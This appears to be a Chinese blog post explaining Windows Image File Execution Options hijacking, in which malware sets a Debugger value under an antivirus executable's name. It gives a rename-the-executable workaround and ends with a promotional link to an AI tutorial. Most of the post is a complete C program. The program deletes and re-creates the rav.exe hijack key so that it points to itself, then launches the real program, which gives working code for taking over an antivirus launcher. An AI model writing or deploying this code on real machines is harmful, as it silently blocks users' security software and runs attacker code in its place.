所谓的镜像劫持,就是在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options]处新建一个以杀毒软件主程序命名的项,例如Rav.exe。然后再创建一个子键“Debugger="C:\WINDOWS\system32\drivers\”。以后只要用户双击 Rav.exe就会运行OSO的病毒文件,类似文件关联的效果。
镜像劫持的简单解决方法
如果电脑上有杀毒软件或360什么的但是中了镜像劫持是安全软件无法运行的话,
其实只需要更改一下安全软件的名字就能不被镜像劫持利用,个人认为这是最适合初学者的最简单办法。
首先找到安全软件的位置大部分都放在program files文件夹下。 找到名字例如拿360做例子原文件路径X:\Program Files\360safe原名为360Safe.exe 你把名字改为36015safe.exe(名字什么都行不过就不能是安全软件的名字)然后双击此安全软件就会过镜像劫持开始运行,后面的查杀就不需要说什么了吧。这小操作可以解决燃眉之急啦。
#include "stdafx.h"#include <stdio.h>#include <windows.h>int main(int argc, char* argv[]){ char temp[256]; DWORD ret; LPCTSTR szRegKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"; //定义字符串指针,保存映像劫持的键位 HKEY h_KEY; if(argc!=1) //如果参数不是1个,提取第2个参数,也就是被劫持程序的路径 { memset(temp,0,256); strcpy(temp,argv[1]); for(int i=0;i<strlen(temp);i++) //将路径中的\换为/,也可以换为\\,就是代码长了点 { if(temp[i]=='\\') temp[i]='/'; } ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey,0,KEY_ALL_ACCESS,&h_KEY); //打开注册表中需要映像劫持的子键获得句柄 if(ret==ERROR_SUCCESS) { printf("open ok!\n"); if(ERROR_SUCCESS==RegDeleteKey(h_KEY,"rav.exe")) //将上面打开的子键下的rav子键删除 { printf("delete ok!\n"); RegCloseKey(h_KEY); WinExec(temp,SW_SHOW); //运行被劫持的程序 } else { printf("delete failed!\n"); RegCloseKey(h_KEY); } } else printf("open failed!\n"); } memset(temp,0,256); GetModuleFileName(NULL,temp,256); //得到程序自己的路径,为下面写入注册表做准备 HKEY hResultKey = NULL; if (ERROR_SUCCESS == RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey, 0, KEY_ALL_ACCESS,&h_KEY)) //打开注册表中映像劫持的子键,获得句柄 { DWORD dw; ret = RegCreateKeyEx(h_KEY,"rav.exe", 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL,&hResultKey, &dw); //在上面打开的子键下创建rav子键并打开,获得句柄 if (ret!=ERROR_SUCCESS) { RegCloseKey(h_KEY); printf("creat failed!\n"); return 1; } printf("creat ok!\n"); ret=RegSetValueEx(hResultKey,"debugger",0,REG_SZ,(const BYTE *)temp,strlen(temp)+1); //在rav键上创建debugger键并设置值为本程序的路径用于映像劫持 if(ret!=ERROR_SUCCESS) { RegCloseKey(h_KEY); RegCloseKey(hResultKey); return 1; } RegCloseKey(h_KEY); RegCloseKey(hResultKey); printf("set ok!\n"); } MessageBox(NULL,"ok!","成功!",MB_OK); //用于测试程序,可以监视 return 0;}再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow